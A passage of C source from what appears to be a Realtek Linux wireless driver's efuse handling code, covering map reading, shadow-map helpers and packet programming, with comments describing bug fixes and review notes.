	efuse_tbl = kmalloc(rtlpriv->cfg->maps[EFUSE_HWSET_MAX_SIZE] *
			    sizeof(u8), GFP_ATOMIC);
	if (!efuse_tbl)
		return;
	/*
	 * BUG FIX: the pointer array must be zero-initialized (kzalloc) so
	 * the cleanup loop below only kfree()s rows that were actually
	 * allocated -- the old kmalloc left the slots uninitialized and a
	 * partial allocation failure freed garbage pointers.  Likewise, if
	 * the array itself cannot be allocated we must not jump to 'done',
	 * which dereferenced the NULL efuse_word; free the table directly.
	 */
	efuse_word = kzalloc(EFUSE_MAX_WORD_UNIT * sizeof(u16 *), GFP_ATOMIC);
	if (!efuse_word)
		goto out_tbl;
	for (i = 0; i < EFUSE_MAX_WORD_UNIT; i++) {
		efuse_word[i] = kmalloc(efuse_max_section * sizeof(u16),
					GFP_ATOMIC);
		if (!efuse_word[i])
			goto done;
	}

	/* the logical map defaults to all-ones (unprogrammed) */
	for (i = 0; i < efuse_max_section; i++)
		for (j = 0; j < EFUSE_MAX_WORD_UNIT; j++)
			efuse_word[j][i] = 0xFFFF;

	read_efuse_byte(hw, efuse_addr, rtemp8);
	if (*rtemp8 != 0xFF) {
		efuse_utilized++;
		RTPRINT(rtlpriv, FEEPROM, EFUSE_READ_ALL,
			"Addr=%d\n", efuse_addr);
		efuse_addr++;
	}

	/* walk the physical packets: header byte, then the enabled words */
	while ((*rtemp8 != 0xFF) && (efuse_addr < efuse_len)) {
		offset = ((*rtemp8 >> 4) & 0x0f);
		if (offset < efuse_max_section) {
			wren = (*rtemp8 & 0x0f);	/* active-low word enables */
			RTPRINT(rtlpriv, FEEPROM, EFUSE_READ_ALL,
				"offset-%d Worden=%x\n", offset, wren);

			for (i = 0; i < EFUSE_MAX_WORD_UNIT; i++) {
				if (!(wren & 0x01)) {
					RTPRINT(rtlpriv, FEEPROM,
						EFUSE_READ_ALL,
						"Addr=%d\n", efuse_addr);
					read_efuse_byte(hw, efuse_addr, rtemp8);
					efuse_addr++;
					efuse_utilized++;
					efuse_word[i][offset] =
							 (*rtemp8 & 0xff);
					if (efuse_addr >= efuse_len)
						break;
					RTPRINT(rtlpriv, FEEPROM,
						EFUSE_READ_ALL,
						"Addr=%d\n", efuse_addr);
					read_efuse_byte(hw, efuse_addr, rtemp8);
					efuse_addr++;
					efuse_utilized++;
					efuse_word[i][offset] |=
					    (((u16)*rtemp8 << 8) & 0xff00);
					if (efuse_addr >= efuse_len)
						break;
				}
				wren >>= 1;
			}
		}

		RTPRINT(rtlpriv, FEEPROM, EFUSE_READ_ALL,
			"Addr=%d\n", efuse_addr);
		read_efuse_byte(hw, efuse_addr, rtemp8);
		if (*rtemp8 != 0xFF && (efuse_addr < efuse_len)) {
			efuse_utilized++;
			efuse_addr++;
		}
	}

	/* flatten the per-word map into the byte-oriented logical table */
	for (i = 0; i < efuse_max_section; i++) {
		for (j = 0; j < EFUSE_MAX_WORD_UNIT; j++) {
			efuse_tbl[(i * 8) + (j * 2)] =
			    (efuse_word[j][i] & 0xff);
			efuse_tbl[(i * 8) + ((j * 2) + 1)] =
			    ((efuse_word[j][i] >> 8) & 0xff);
		}
	}

	for (i = 0; i < _size_byte; i++)
		pbuf[i] = efuse_tbl[_offset + i];

	/* refresh cached usage statistics and report them to the HAL */
	rtlefuse->efuse_usedbytes = efuse_utilized;
	efuse_usage = (u8) ((efuse_utilized * 100) / efuse_len);
	rtlefuse->efuse_usedpercentage = efuse_usage;
	rtlpriv->cfg->ops->set_hw_reg(hw, HW_VAR_EFUSE_BYTES,
				      (u8 *)&efuse_utilized);
	rtlpriv->cfg->ops->set_hw_reg(hw, HW_VAR_EFUSE_USAGE,
				      (u8 *)&efuse_usage);

done:
	for (i = 0; i < EFUSE_MAX_WORD_UNIT; i++)
		kfree(efuse_word[i]);
	kfree(efuse_word);
out_tbl:
	kfree(efuse_tbl);
}
/*
 * Check whether flushing the shadow map would fit in the physical efuse.
 * Counts, per 8-byte section, the 2-byte words that differ between the
 * INIT and MODIFY maps (one header byte per dirty section, two bytes per
 * dirty word) and compares the total plus current usage against
 * EFUSE_MAX_SIZE minus the protected tail.  Returns false when it would
 * not fit.
 */
bool efuse_shadow_update_chk(struct ieee80211_hw *hw)
{
	struct rtl_priv *rtlpriv = rtl_priv(hw);
	struct rtl_efuse *rtlefuse = rtl_efuse(rtl_priv(hw));
	u8 section_idx, i, Base;
	u16 words_need = 0, hdr_num = 0, totalbytes, efuse_used;
	bool wordchanged, result = true;

	for (section_idx = 0; section_idx < 16; section_idx++) {
		Base = section_idx * 8;
		wordchanged = false;

		/* a word is dirty if either of its two bytes changed */
		for (i = 0; i < 8; i = i + 2) {
			if ((rtlefuse->efuse_map[EFUSE_INIT_MAP][Base + i] !=
			     rtlefuse->efuse_map[EFUSE_MODIFY_MAP][Base + i]) ||
			    (rtlefuse->efuse_map[EFUSE_INIT_MAP][Base + i + 1] !=
			     rtlefuse->efuse_map[EFUSE_MODIFY_MAP][Base + i +
								   1])) {
				words_need++;
				wordchanged = true;
			}
		}

		if (wordchanged)
			hdr_num++;
	}

	totalbytes = hdr_num + words_need * 2;
	efuse_used = rtlefuse->efuse_usedbytes;

	if ((totalbytes + efuse_used) >=
	    (EFUSE_MAX_SIZE - EFUSE_OOB_PROTECT_BYTES))
		result = false;

	RT_TRACE(rtlpriv, COMP_EFUSE, DBG_LOUD,
		 "efuse_shadow_update_chk(): totalbytes(%#x), hdr_num(%#x), words_need(%#x), efuse_used(%d)\n",
		 totalbytes, hdr_num, words_need, efuse_used);

	return result;
}
/*
 * Read 1, 2 or 4 bytes (selected by @type) from the shadow map at
 * @offset into *@value; unknown sizes are silently ignored.
 */
void efuse_shadow_read(struct ieee80211_hw *hw, u8 type,
		       u16 offset, u32 *value)
{
	switch (type) {
	case 1:
		efuse_shadow_read_1byte(hw, offset, (u8 *) value);
		break;
	case 2:
		efuse_shadow_read_2byte(hw, offset, (u16 *) value);
		break;
	case 4:
		efuse_shadow_read_4byte(hw, offset, (u32 *) value);
		break;
	}
}
/*
 * Write 1, 2 or 4 bytes (selected by @type) of @value into the shadow
 * map at @offset; unknown sizes are silently ignored.
 */
void efuse_shadow_write(struct ieee80211_hw *hw, u8 type, u16 offset,
			u32 value)
{
	switch (type) {
	case 1:
		efuse_shadow_write_1byte(hw, offset, (u8) value);
		break;
	case 2:
		efuse_shadow_write_2byte(hw, offset, (u16) value);
		break;
	case 4:
		efuse_shadow_write_4byte(hw, offset, value);
		break;
	}
}
/*
 * Flush the MODIFY shadow map into the physical efuse.  If the changes
 * would not fit, both shadow maps are re-synced from hardware and false
 * is returned.  Otherwise each 8-byte section whose words changed is
 * programmed via efuse_pg_packet_write() (word_en bits are active low),
 * power to the efuse block is toggled around the writes, and the shadow
 * maps are refreshed from hardware afterwards.
 */
bool efuse_shadow_update(struct ieee80211_hw *hw)
{
	struct rtl_priv *rtlpriv = rtl_priv(hw);
	struct rtl_efuse *rtlefuse = rtl_efuse(rtl_priv(hw));
	u16 i, offset, base;
	u8 word_en = 0x0F;
	/* NOTE(review): first_pg is never set to true anywhere in this
	 * function, so the 'if (first_pg)' branch below is dead code as
	 * written -- confirm intent before removing. */
	u8 first_pg = false;

	RT_TRACE(rtlpriv, COMP_EFUSE, DBG_LOUD, "--->\n");

	if (!efuse_shadow_update_chk(hw)) {
		efuse_read_all_map(hw, &rtlefuse->efuse_map[EFUSE_INIT_MAP][0]);
		memcpy(&rtlefuse->efuse_map[EFUSE_MODIFY_MAP][0],
		       &rtlefuse->efuse_map[EFUSE_INIT_MAP][0],
		       rtlpriv->cfg->maps[EFUSE_HWSET_MAX_SIZE]);

		RT_TRACE(rtlpriv, COMP_EFUSE, DBG_LOUD,
			 "<---efuse out of capacity!!\n");
		return false;
	}
	efuse_power_switch(hw, true, true);

	for (offset = 0; offset < 16; offset++) {

		word_en = 0x0F;
		base = offset * 8;

		/* clear the word_en bit (active low) for each changed word */
		for (i = 0; i < 8; i++) {
			if (first_pg) {
				word_en &= ~(BIT(i / 2));
				rtlefuse->efuse_map[EFUSE_INIT_MAP][base + i] =
				    rtlefuse->efuse_map[EFUSE_MODIFY_MAP][base + i];
			} else {

				if (rtlefuse->efuse_map[EFUSE_INIT_MAP][base + i] !=
				    rtlefuse->efuse_map[EFUSE_MODIFY_MAP][base + i]) {
					word_en &= ~(BIT(i / 2));

					rtlefuse->efuse_map[EFUSE_INIT_MAP][base + i] =
					    rtlefuse->efuse_map[EFUSE_MODIFY_MAP][base + i];
				}
			}
		}

		/* program the section only if at least one word changed */
		if (word_en != 0x0F) {
			u8 tmpdata[8];

			memcpy(tmpdata,
			       &rtlefuse->efuse_map[EFUSE_MODIFY_MAP][base],
			       8);
			RT_PRINT_DATA(rtlpriv, COMP_INIT, DBG_LOUD,
				      "U-efuse", tmpdata, 8);

			if (!efuse_pg_packet_write(hw, (u8) offset, word_en,
						   tmpdata)) {
				RT_TRACE(rtlpriv, COMP_ERR, DBG_WARNING,
					 "PG section(%#x) fail!!\n", offset);
				break;
			}
		}
	}

	efuse_power_switch(hw, true, false);
	efuse_read_all_map(hw, &rtlefuse->efuse_map[EFUSE_INIT_MAP][0]);

	memcpy(&rtlefuse->efuse_map[EFUSE_MODIFY_MAP][0],
	       &rtlefuse->efuse_map[EFUSE_INIT_MAP][0],
	       rtlpriv->cfg->maps[EFUSE_HWSET_MAX_SIZE]);

	RT_TRACE(rtlpriv, COMP_EFUSE, DBG_LOUD, "<---\n");
	return true;
}
void rtl_efuse_shadow_map_update(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_efuse *rtlefuse = rtl_efuse(rtl_priv(hw));
if (rtlefuse->autoload_failflag)
memset(&rtlefuse->efuse_map[EFUSE_INIT_MAP][0], 0xFF,
rtlpriv->cfg->maps[EFUSE_HWSET_MAX_SIZE]);
else
efuse_read_all_map(hw, &rtlefuse->efuse_map[EFUSE_INIT_MAP][0]);
memcpy(&rtlefuse->efuse_map[EFUSE_MODIFY_MAP][0],
&rtlefuse->efuse_map[EFUSE_INIT_MAP][0],
rtlpriv->cfg->maps[EFUSE_HWSET_MAX_SIZE]);
}
EXPORT_SYMBOL(rtl_efuse_shadow_map_update);
/*
 * Program a fixed vendor-id pattern into efuse section 1.
 * Bytes 0xEC,0x10 are little-endian 0x10EC — presumably the Realtek
 * PCI vendor ID; confirm against the EEPROM layout.  word_en 0xD
 * (~BIT(1)) enables only word 1 (bytes 2-3) of the section.
 */
void efuse_force_write_vendor_Id(struct ieee80211_hw *hw)
{
	u8 tmpdata[8] = { 0xFF, 0xFF, 0xEC, 0x10, 0xFF, 0xFF, 0xFF, 0xFF };

	/* Power/clock the efuse block for writing, write, power down. */
	efuse_power_switch(hw, true, true);
	efuse_pg_packet_write(hw, 1, 0xD, tmpdata);
	efuse_power_switch(hw, true, false);
}
/* Intentionally empty: re-programming of an existing PG section is not
 * implemented for this driver; kept as a stub for interface parity. */
void efuse_re_pg_section(struct ieee80211_hw *hw, u8 section_idx)
{
}
/* Fetch one byte at @offset from the modify (shadow) map. */
static void efuse_shadow_read_1byte(struct ieee80211_hw *hw,
				    u16 offset, u8 *value)
{
	struct rtl_efuse *rtlefuse = rtl_efuse(rtl_priv(hw));
	u8 *shadow = rtlefuse->efuse_map[EFUSE_MODIFY_MAP];

	*value = shadow[offset];
}
/* Assemble a little-endian 16-bit value from the shadow map. */
static void efuse_shadow_read_2byte(struct ieee80211_hw *hw,
				    u16 offset, u16 *value)
{
	struct rtl_efuse *rtlefuse = rtl_efuse(rtl_priv(hw));
	u8 *shadow = rtlefuse->efuse_map[EFUSE_MODIFY_MAP];

	*value = shadow[offset] | (shadow[offset + 1] << 8);
}
/* Assemble a little-endian 32-bit value from the shadow map. */
static void efuse_shadow_read_4byte(struct ieee80211_hw *hw,
				    u16 offset, u32 *value)
{
	struct rtl_efuse *rtlefuse = rtl_efuse(rtl_priv(hw));
	u8 *shadow = rtlefuse->efuse_map[EFUSE_MODIFY_MAP];
	u32 word = 0;
	int i;

	for (i = 3; i >= 0; i--)
		word = (word << 8) | shadow[offset + i];

	*value = word;
}
/* Store one byte at @offset in the modify (shadow) map. */
static void efuse_shadow_write_1byte(struct ieee80211_hw *hw,
				     u16 offset, u8 value)
{
	struct rtl_efuse *rtlefuse = rtl_efuse(rtl_priv(hw));
	u8 *shadow = rtlefuse->efuse_map[EFUSE_MODIFY_MAP];

	shadow[offset] = value;
}
/* Store a 16-bit value little-endian into the shadow map. */
static void efuse_shadow_write_2byte(struct ieee80211_hw *hw,
				     u16 offset, u16 value)
{
	struct rtl_efuse *rtlefuse = rtl_efuse(rtl_priv(hw));
	u8 *shadow = rtlefuse->efuse_map[EFUSE_MODIFY_MAP];

	shadow[offset] = (u8)(value & 0x00FF);
	shadow[offset + 1] = (u8)(value >> 8);
}
/* Store a 32-bit value little-endian into the shadow map. */
static void efuse_shadow_write_4byte(struct ieee80211_hw *hw,
				     u16 offset, u32 value)
{
	struct rtl_efuse *rtlefuse = rtl_efuse(rtl_priv(hw));
	u8 *shadow = rtlefuse->efuse_map[EFUSE_MODIFY_MAP];
	int i;

	for (i = 0; i < 4; i++)
		shadow[offset + i] = (u8)(value >> (8 * i));
}
/*
 * Read one raw efuse byte at @addr through the EFUSE_CTRL register
 * block.  Returns true and stores the byte in *data on success;
 * returns false and stores 0xff if the controller does not signal
 * completion within 100 polls.
 */
static int efuse_one_byte_read(struct ieee80211_hw *hw, u16 addr, u8 *data)
{
	struct rtl_priv *rtlpriv = rtl_priv(hw);
	u8 tmpidx = 0;
	int result;

	/* Latch the low 8 address bits into CTRL+1, then the top two
	 * bits into CTRL+2 (preserving that register's upper 6 bits). */
	rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL] + 1,
		       (u8) (addr & 0xff));
	rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL] + 2,
		       ((u8) ((addr >> 8) & 0x03)) |
		       (rtl_read_byte(rtlpriv,
				      rtlpriv->cfg->maps[EFUSE_CTRL] + 2) &
			0xFC));

	/* 0x72 starts the read; bit 7 of CTRL+3 flags completion. */
	rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL] + 3, 0x72);

	/* Busy-poll for completion, bounded to 100 iterations. */
	while (!(0x80 & rtl_read_byte(rtlpriv,
				      rtlpriv->cfg->maps[EFUSE_CTRL] + 3))
	       && (tmpidx < 100)) {
		tmpidx++;
	}

	if (tmpidx < 100) {
		*data = rtl_read_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL]);
		result = true;
	} else {
		*data = 0xff;
		result = false;
	}
	return result;
}
/*
 * Write one raw efuse byte @data at @addr through the EFUSE_CTRL
 * register block.  Returns true when the controller signals completion
 * within 100 polls, false on timeout (the byte may not have been
 * programmed).
 */
static int efuse_one_byte_write(struct ieee80211_hw *hw, u16 addr, u8 data)
{
	struct rtl_priv *rtlpriv = rtl_priv(hw);
	u8 tmpidx = 0;

	RT_TRACE(rtlpriv, COMP_EFUSE, DBG_LOUD, "Addr = %x Data=%x\n",
		 addr, data);

	/* Latch the low 8 address bits, then the top two bits while
	 * preserving the upper 6 bits of CTRL+2. */
	rtl_write_byte(rtlpriv,
		       rtlpriv->cfg->maps[EFUSE_CTRL] + 1, (u8) (addr & 0xff));
	rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL] + 2,
		       (rtl_read_byte(rtlpriv,
				      rtlpriv->cfg->maps[EFUSE_CTRL] +
				      2) & 0xFC) | (u8) ((addr >> 8) & 0x03));

	/* Stage the data byte, then 0xF2 starts the write; bit 7 of
	 * CTRL+3 clears when the operation completes. */
	rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL], data);
	rtl_write_byte(rtlpriv, rtlpriv->cfg->maps[EFUSE_CTRL] + 3, 0xF2);

	/* Busy-poll for completion, bounded to 100 iterations. */
	while ((0x80 & rtl_read_byte(rtlpriv,
				     rtlpriv->cfg->maps[EFUSE_CTRL] + 3))
	       && (tmpidx < 100)) {
		tmpidx++;
	}

	if (tmpidx < 100)
		return true;
	return false;
}
/* Read the whole logical efuse map into @efuse, power-cycling the
 * efuse block (read mode) around the transfer. */
static void efuse_read_all_map(struct ieee80211_hw *hw, u8 *efuse)
{
	struct rtl_priv *rtlpriv = rtl_priv(hw);
	u32 map_len = rtlpriv->cfg->maps[EFUSE_HWSET_MAX_SIZE];

	efuse_power_switch(hw, false, true);
	read_efuse(hw, 0, map_len, efuse);
	efuse_power_switch(hw, false, false);
}
/*
 * PG_STATE_HEADER handler for efuse_pg_packet_read(): @efuse_data is a
 * packet header found at *efuse_addr.  If the packet belongs to section
 * @offset, read its payload into @tmpdata and switch the state machine
 * to PG_STATE_DATA; otherwise skip past the packet.
 *
 * Fix: the original set "dataempty = true" on seeing a non-0xff payload
 * byte (a no-op — it was initialized true) and then branched on
 * "dataempty", so even an all-0xff (blank) payload was reported as
 * valid data.  Clear the flag when real data is seen and branch on
 * !dataempty, skipping blank packets like the non-matching case.
 */
static void efuse_read_data_case1(struct ieee80211_hw *hw, u16 *efuse_addr,
				  u8 efuse_data, u8 offset, u8 *tmpdata,
				  u8 *readstate)
{
	bool dataempty = true;
	u8 hoffset;
	u8 tmpidx;
	u8 hworden;
	u8 word_cnts;

	hoffset = (efuse_data >> 4) & 0x0F;	/* header: section offset */
	hworden = efuse_data & 0x0F;		/* header: word-enable mask */
	word_cnts = efuse_calculate_word_cnts(hworden);

	if (hoffset == offset) {
		/* Matching section: pull the payload bytes that follow
		 * the header and note whether any carry real data. */
		for (tmpidx = 0; tmpidx < word_cnts * 2; tmpidx++) {
			if (efuse_one_byte_read(hw, *efuse_addr + 1 + tmpidx,
						&efuse_data)) {
				tmpdata[tmpidx] = efuse_data;
				if (efuse_data != 0xff)
					dataempty = false;
			}
		}

		if (!dataempty) {
			*readstate = PG_STATE_DATA;
		} else {
			/* Blank payload: skip header + payload. */
			*efuse_addr = *efuse_addr + (word_cnts * 2) + 1;
			*readstate = PG_STATE_HEADER;
		}
	} else {
		/* Different section: skip header + payload. */
		*efuse_addr = *efuse_addr + (word_cnts * 2) + 1;
		*readstate = PG_STATE_HEADER;
	}
}
/*
 * Collect the merged payload for section @offset by scanning all PG
 * packets in the efuse.  Returns true when any byte of @data differs
 * from 0xff afterwards, false for a blank/unused section or bad args.
 */
static int efuse_pg_packet_read(struct ieee80211_hw *hw, u8 offset, u8 *data)
{
	u8 readstate = PG_STATE_HEADER;
	bool continual = true;
	/* NOTE(review): word_cnts is never updated, so the
	 * PG_STATE_DATA branch below advances efuse_addr by only one
	 * byte — verify the scan arithmetic against the vendor driver. */
	u8 efuse_data, word_cnts = 0;
	u16 efuse_addr = 0;
	u8 tmpdata[8];

	if (data == NULL)
		return false;
	if (offset > 15)
		return false;

	memset(data, 0xff, PGPKT_DATA_SIZE * sizeof(u8));
	memset(tmpdata, 0xff, PGPKT_DATA_SIZE * sizeof(u8));

	while (continual && (efuse_addr < EFUSE_MAX_SIZE)) {
		if (readstate & PG_STATE_HEADER) {
			/* A 0xFF header marks the end of the programmed
			 * area and stops the scan. */
			if (efuse_one_byte_read(hw, efuse_addr, &efuse_data)
			    && (efuse_data != 0xFF))
				efuse_read_data_case1(hw, &efuse_addr,
						      efuse_data,
						      offset, tmpdata,
						      &readstate);
			else
				continual = false;
		} else if (readstate & PG_STATE_DATA) {
			/* word_en 0 == all words enabled: merge the whole
			 * packet payload into @data. */
			efuse_word_enable_data_read(0, tmpdata, data);
			efuse_addr = efuse_addr + (word_cnts * 2) + 1;
			readstate = PG_STATE_HEADER;
		}
	}

	/* A section that never received a packet stays all-0xff. */
	if ((data[0] == 0xff) && (data[1] == 0xff) &&
	    (data[2] == 0xff) && (data[3] == 0xff) &&
	    (data[4] == 0xff) && (data[5] == 0xff) &&
	    (data[6] == 0xff) && (data[7] == 0xff))
		return false;
	else
		return true;
}
/*
 * PG_STATE_HEADER handler for efuse_pg_packet_write() when an existing
 * packet header was found at *efuse_addr.  Skips packets belonging to
 * other sections; for a matching section with a still-blank payload it
 * tries to reuse the packet for the overlapping words and re-queues the
 * remainder.  Retries are counted in *repeat_times; exceeding
 * EFUSE_REPEAT_THRESHOLD_ aborts via *continual/*result.
 */
static void efuse_write_data_case1(struct ieee80211_hw *hw, u16 *efuse_addr,
				   u8 efuse_data, u8 offset, int *continual,
				   u8 *write_state, struct pgpkt_struct *target_pkt,
				   int *repeat_times, int *result, u8 word_en)
{
	struct rtl_priv *rtlpriv = rtl_priv(hw);
	struct pgpkt_struct tmp_pkt;
	bool dataempty = true;
	/* NOTE(review): originaldata is never filled before being passed
	 * to efuse_pg_packet_write() below — it looks like it should
	 * hold the packet's current payload; confirm against the vendor
	 * driver. */
	u8 originaldata[8 * sizeof(u8)];
	u8 badworden = 0x0F;
	u8 match_word_en, tmp_word_en;
	u8 tmpindex;
	u8 tmp_header = efuse_data;
	u8 tmp_word_cnts;

	/* Decode the header that is already in the efuse. */
	tmp_pkt.offset = (tmp_header >> 4) & 0x0F;
	tmp_pkt.word_en = tmp_header & 0x0F;
	tmp_word_cnts = efuse_calculate_word_cnts(tmp_pkt.word_en);

	if (tmp_pkt.offset != target_pkt->offset) {
		/* Different section: skip header + payload. */
		*efuse_addr = *efuse_addr + (tmp_word_cnts * 2) + 1;
		*write_state = PG_STATE_HEADER;
	} else {
		/* Same section: is its payload area still blank? */
		for (tmpindex = 0; tmpindex < (tmp_word_cnts * 2); tmpindex++) {
			u16 address = *efuse_addr + 1 + tmpindex;

			if (efuse_one_byte_read(hw, address,
						&efuse_data) && (efuse_data != 0xFF))
				dataempty = false;
		}

		if (!dataempty) {
			/* Already programmed: skip this packet. */
			*efuse_addr = *efuse_addr + (tmp_word_cnts * 2) + 1;
			*write_state = PG_STATE_HEADER;
		} else {
			/* match_word_en: bit cleared where BOTH packets
			 * enable the word (enable == bit clear), i.e. the
			 * overlap we can write into this packet. */
			match_word_en = 0x0F;
			if (!((target_pkt->word_en & BIT(0)) |
			    (tmp_pkt.word_en & BIT(0))))
				match_word_en &= (~BIT(0));

			if (!((target_pkt->word_en & BIT(1)) |
			    (tmp_pkt.word_en & BIT(1))))
				match_word_en &= (~BIT(1));

			if (!((target_pkt->word_en & BIT(2)) |
			    (tmp_pkt.word_en & BIT(2))))
				match_word_en &= (~BIT(2));

			if (!((target_pkt->word_en & BIT(3)) |
			    (tmp_pkt.word_en & BIT(3))))
				match_word_en &= (~BIT(3));

			if ((match_word_en & 0x0F) != 0x0F) {
				/* Some overlap: write those words into the
				 * existing packet's payload area. */
				badworden = efuse_word_enable_data_write(
								hw, *efuse_addr + 1,
								tmp_pkt.word_en,
								target_pkt->data);

				/* Re-queue any word that failed verify. */
				if (0x0F != (badworden & 0x0F)) {
					u8 reorg_offset = offset;
					u8 reorg_worden = badworden;

					efuse_pg_packet_write(hw, reorg_offset,
							      reorg_worden,
							      originaldata);
				}

				/* tmp_word_en: words requested but NOT
				 * covered by the overlap — still pending. */
				tmp_word_en = 0x0F;
				if ((target_pkt->word_en & BIT(0)) ^
				    (match_word_en & BIT(0)))
					tmp_word_en &= (~BIT(0));

				if ((target_pkt->word_en & BIT(1)) ^
				    (match_word_en & BIT(1)))
					tmp_word_en &= (~BIT(1));

				if ((target_pkt->word_en & BIT(2)) ^
				    (match_word_en & BIT(2)))
					tmp_word_en &= (~BIT(2));

				if ((target_pkt->word_en & BIT(3)) ^
				    (match_word_en & BIT(3)))
					tmp_word_en &= (~BIT(3));

				if ((tmp_word_en & 0x0F) != 0x0F) {
					/* Continue after the used area with
					 * the remaining words. */
					*efuse_addr = efuse_get_current_size(hw);
					target_pkt->offset = offset;
					target_pkt->word_en = tmp_word_en;
				} else {
					*continual = false;
				}
				*write_state = PG_STATE_HEADER;
				*repeat_times += 1;
				if (*repeat_times > EFUSE_REPEAT_THRESHOLD_) {
					*continual = false;
					*result = false;
				}
			} else {
				/* No overlap: move past and retry with the
				 * original request. */
				*efuse_addr += (2 * tmp_word_cnts) + 1;
				target_pkt->offset = offset;
				target_pkt->word_en = word_en;
				*write_state = PG_STATE_HEADER;
			}
		}
	}
	RTPRINT(rtlpriv, FEEPROM, EFUSE_PG, "efuse PG_STATE_HEADER-1\n");
}
/*
 * PG_STATE_HEADER handler for efuse_pg_packet_write() when the byte at
 * *efuse_addr is blank (0xFF): write the target packet's header and
 * verify it.  On a clean write the state machine proceeds to
 * PG_STATE_DATA; on a partial/corrupt header the salvageable words of
 * the damaged packet are rewritten elsewhere and the attempt is
 * retried, bounded by EFUSE_REPEAT_THRESHOLD_.
 */
static void efuse_write_data_case2(struct ieee80211_hw *hw, u16 *efuse_addr,
				   int *continual, u8 *write_state,
				   struct pgpkt_struct target_pkt,
				   int *repeat_times, int *result)
{
	struct rtl_priv *rtlpriv = rtl_priv(hw);
	struct pgpkt_struct tmp_pkt;
	u8 pg_header;
	u8 tmp_header;
	u8 originaldata[8 * sizeof(u8)];
	u8 tmp_word_cnts;
	u8 badworden = 0x0F;

	/* Header byte: section offset in the high nibble, word-enable
	 * mask in the low nibble.  Write it, then read it back. */
	pg_header = ((target_pkt.offset << 4) & 0xf0) | target_pkt.word_en;
	efuse_one_byte_write(hw, *efuse_addr, pg_header);
	efuse_one_byte_read(hw, *efuse_addr, &tmp_header);

	if (tmp_header == pg_header) {
		/* Header landed intact: go write the payload. */
		*write_state = PG_STATE_DATA;
	} else if (tmp_header == 0xFF) {
		/* Nothing stuck: retry at the same address. */
		*write_state = PG_STATE_HEADER;
		*repeat_times += 1;
		if (*repeat_times > EFUSE_REPEAT_THRESHOLD_) {
			*continual = false;
			*result = false;
		}
	} else {
		/* Partially-programmed header: treat it as a foreign
		 * packet, salvage that section's data and move on. */
		tmp_pkt.offset = (tmp_header >> 4) & 0x0F;
		tmp_pkt.word_en = tmp_header & 0x0F;
		tmp_word_cnts = efuse_calculate_word_cnts(tmp_pkt.word_en);

		memset(originaldata, 0xff, 8 * sizeof(u8));

		if (efuse_pg_packet_read(hw, tmp_pkt.offset, originaldata)) {
			badworden = efuse_word_enable_data_write(hw,
								 *efuse_addr + 1, tmp_pkt.word_en,
								 originaldata);

			if (0x0F != (badworden & 0x0F)) {
				/* Some words failed verify: rewrite them
				 * as a fresh packet further along. */
				u8 reorg_offset = tmp_pkt.offset;
				u8 reorg_worden = badworden;

				efuse_pg_packet_write(hw, reorg_offset,
						      reorg_worden,
						      originaldata);
				*efuse_addr = efuse_get_current_size(hw);
			} else {
				*efuse_addr = *efuse_addr + (tmp_word_cnts * 2)
					      + 1;
			}
		} else {
			*efuse_addr = *efuse_addr + (tmp_word_cnts * 2) + 1;
		}

		*write_state = PG_STATE_HEADER;
		*repeat_times += 1;
		if (*repeat_times > EFUSE_REPEAT_THRESHOLD_) {
			*continual = false;
			*result = false;
		}

		RTPRINT(rtlpriv, FEEPROM, EFUSE_PG,
			"efuse PG_STATE_HEADER-2\n");
	}
}
/*
 * Write @data (masked by @word_en) as a PG packet for section @offset,
 * driving a small header/data state machine over the efuse and retrying
 * damaged words up to EFUSE_REPEAT_THRESHOLD_ times.
 *
 * Fixes: repeat_times was "static", so retry counts accumulated across
 * unrelated calls and, once the threshold had ever been exceeded, every
 * later call started at the limit — it is now a per-call counter.  The
 * function also returned true unconditionally, discarding the failure
 * status tracked in "result"; it now returns it so callers such as
 * efuse_shadow_update() can react to PG failures they already test for.
 */
static int efuse_pg_packet_write(struct ieee80211_hw *hw,
				 u8 offset, u8 word_en, u8 *data)
{
	struct rtl_priv *rtlpriv = rtl_priv(hw);
	struct pgpkt_struct target_pkt;
	u8 write_state = PG_STATE_HEADER;
	int continual = true, result = true;
	u16 efuse_addr = 0;
	u8 efuse_data;
	u8 target_word_cnts = 0;
	u8 badworden = 0x0F;
	int repeat_times = 0;	/* was static: retries leaked across calls */

	/* Refuse to write into the OOB-protected tail of the efuse. */
	if (efuse_get_current_size(hw) >=
	    (EFUSE_MAX_SIZE - EFUSE_OOB_PROTECT_BYTES)) {
		RTPRINT(rtlpriv, FEEPROM, EFUSE_PG,
			"efuse_pg_packet_write error\n");
		return false;
	}

	/* Build the target packet: only words enabled (bit clear) in
	 * @word_en are taken from @data, the rest stay 0xFF. */
	target_pkt.offset = offset;
	target_pkt.word_en = word_en;
	memset(target_pkt.data, 0xFF, 8 * sizeof(u8));
	efuse_word_enable_data_read(word_en, data, target_pkt.data);
	target_word_cnts = efuse_calculate_word_cnts(target_pkt.word_en);

	RTPRINT(rtlpriv, FEEPROM, EFUSE_PG, "efuse Power ON\n");

	while (continual && (efuse_addr <
	       (EFUSE_MAX_SIZE - EFUSE_OOB_PROTECT_BYTES))) {
		if (write_state == PG_STATE_HEADER) {
			badworden = 0x0F;
			RTPRINT(rtlpriv, FEEPROM, EFUSE_PG,
				"efuse PG_STATE_HEADER\n");

			/* Non-0xFF byte at efuse_addr is an existing
			 * packet header to merge with or skip; 0xFF (or
			 * a read failure) means blank space to claim. */
			if (efuse_one_byte_read(hw, efuse_addr, &efuse_data) &&
			    (efuse_data != 0xFF))
				efuse_write_data_case1(hw, &efuse_addr,
						       efuse_data, offset,
						       &continual,
						       &write_state,
						       &target_pkt,
						       &repeat_times, &result,
						       word_en);
			else
				efuse_write_data_case2(hw, &efuse_addr,
						       &continual,
						       &write_state,
						       target_pkt,
						       &repeat_times,
						       &result);
		} else if (write_state == PG_STATE_DATA) {
			RTPRINT(rtlpriv, FEEPROM, EFUSE_PG,
				"efuse PG_STATE_DATA\n");
			badworden =
			    efuse_word_enable_data_write(hw, efuse_addr + 1,
							 target_pkt.word_en,
							 target_pkt.data);
			if ((badworden & 0x0F) == 0x0F) {
				/* All requested words verified: done. */
